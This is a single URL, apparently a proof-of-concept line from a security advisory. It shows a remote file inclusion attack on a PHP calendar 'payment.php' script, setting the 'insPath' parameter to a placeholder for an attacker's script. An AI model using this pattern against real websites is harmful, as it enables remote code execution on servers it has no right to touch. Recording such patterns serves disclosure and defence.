http://www.example.com/calendar/payment.php?insPath=[evil_script]